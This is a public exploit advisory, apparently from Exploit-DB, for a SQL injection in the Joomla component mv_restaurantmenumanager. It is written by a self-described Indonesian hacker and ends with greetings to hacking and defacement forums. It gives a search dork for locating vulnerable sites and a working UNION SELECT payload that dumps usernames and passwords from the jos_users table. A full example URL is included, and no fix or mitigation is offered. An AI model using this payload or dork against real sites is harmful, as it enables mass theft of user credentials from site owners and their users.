Joomla! Component mv_restaurantmenumanager – SQL Injection

  • 作者: Sudden_death
    日期: 2010-04-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12162/
  • =========================================================
Joomla component mv_restaurantmenumanager SQL injection Vulnerability
=========================================================

# Exploit Title : joomla component mv_restaurantmenumanager SQL injection Vulnerability
# Date: 12 april 2010
# Author: Sudden_death (suddendeath404@yahoo.com)
# Software Link : N/A
# Tested on : Windows XP 2
# Platform/Tested on: Windows XP 2 SP 2
# category: webapps/0day
# myweb : http://suddendeath.000space.com/
# dork: inurl:option=com_mv_restaurantmenumanager
# Code :+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users

======================================================================

# EXPLOIT / c0de

+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users


# VULN IN HERE

http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5[c0de<http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5%5Bc0de>}



# EXAMPLE

http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users<http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users>


[#]-------------------------------------------------------------------

GREETZ TO WE FORUM:
[ indonesianhacker[dot]com | indonesiandefacer[dot]org ]

[#]-------------------------------------------------------------------

MY BROTHA :
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |

[#]-------------------------------------------------------------------

note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!
    Python